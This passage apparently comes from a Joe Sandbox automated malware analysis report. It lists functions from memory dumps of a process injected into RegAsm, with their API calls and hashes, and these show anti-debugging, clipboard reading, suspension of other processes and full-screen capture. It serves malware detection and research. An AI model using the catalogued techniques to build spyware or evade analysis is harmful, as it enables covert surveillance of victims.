                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                • ExitProcess.KERNEL32 ref: 10004AEE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                • CloseClipboard.USER32 ref: 0040B760
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseDataOpen
                                                                • String ID:
                                                                • API String ID: 2058664381-0
                                                                • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                Function 0041BBC6 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenResume
                                                                • String ID:
                                                                • API String ID: 3614150671-0
                                                                • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                Function 0041BB9A Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                • String ID:
                                                                • API String ID: 1999457699-0
                                                                • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID: MZ@
                                                                • API String ID: 2325560087-2978689999
                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: JD
                                                                • API String ID: 1084509184-2669065882
                                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                • String ID:
                                                                • API String ID: 1663032902-0
                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                • String ID:
                                                                • API String ID: 2692324296-0
                                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID:
                                                                • API String ID: 1084509184-0
                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction Fuzzy Hash:
                                                                Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                • String ID: DISPLAY
                                                                • API String ID: 4256916514-865373369
                                                                • Opcode ID: b81785b538983269000155a5db9ce9f88dc46a30689f781578aa582ea0c925e1
                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                • Opcode Fuzzy Hash: b81785b538983269000155a5db9ce9f88dc46a30689f781578aa582ea0c925e1
                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                Download Yara Rule
                                                                APIs
